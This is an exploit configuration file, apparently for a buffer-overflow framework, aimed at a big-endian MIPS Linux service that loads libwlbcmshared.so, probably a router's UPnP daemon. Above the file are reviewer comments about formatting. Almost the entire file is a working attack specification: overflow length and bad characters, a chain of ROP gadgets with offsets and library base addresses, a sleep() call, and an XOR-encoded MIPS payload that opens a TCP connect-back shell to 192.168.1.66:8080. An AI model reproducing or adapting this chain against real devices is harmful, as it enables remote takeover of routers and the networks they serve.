; NOTE(review): every line below carries a leading "- "; presumably a
; rendering artifact of the paste rather than part of the file — strip
; it before handing this to a parser.
; The consuming tool is not shown here; this assumes ";" full-line
; comments are accepted — TODO confirm, otherwise drop these lines.
; "Section N" names are referenced by value (payloads = Section 10),
; so section names are load-bearing; do not rename them.
- [Overflow Description]
- arch = MIPS
- os = Linux
- endianness = BigEndian
- buffer length = 576
- bad characters = 0x00,0x0d,0x20
- [Section 1]
- type = RopGadget
- offset = 140
- description = upnp_context placeholder.
- rop_address = 0x0001ecbc
- base_address = 0x2aba1000
- [Section 2]
- type = RopGadget
- offset = 136
- description = The epilogue of sub_b100 in libwlbcmshared.so. Sets up S1-S7.
- rop_address = 0x0000b1f8
- base_address = 0x2aba1000
- [Section 3]
- type = RopGadget
- offset = 168
- description = An addr that can be dereferenced & written without crashing.
- rop_address = 0x0001ed10
- base_address = 0x2aba1000
- [Section 4]
- type = RopGadget
- offset = 200
- description = Sets up 3 sec arg to sleep(). jumps $s4
- rop_address = 0x0004b62c
- base_address = 0x2aabe000
- [Section 5]
- type = RopGadget
- offset = 184
- description = load stack data into ra, then jr $s2
- rop_address = 0x000380f0
- base_address = 0x2aabe000
- [Section 6]
- type = RopGadget
- offset = 176
- description = location of sleep() in libc.
- rop_address = 0x0004ffd0
- base_address = 0x2aabe000
- [Section 7]
- type = RopGadget
- offset = 240
- description = add offset from $sp into s5, jalr $s6
- rop_address = 0x000328f4
- base_address = 0x2aabe000
- [Section 8]
- type = RopGadget
- offset = 192
- description = Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.
- rop_address = 0x0001b1f4
- base_address = 0x2aabe000
- [Section 9]
- type = EncodedPayloadSection
- offset = 268
- encoder_class = MipsXorEncoder
- description = MIPS XOR decoder stub with 1 payload.
- key = 0xb59ed6f3
- payloads = Section 10
- [Section 10]
- payload_class = ConnectbackPayload
- description = TCP connect-back shell. Target address & port=192.168.1.66:8080
- connectback_ip = 192.168.1.66
- port = 8080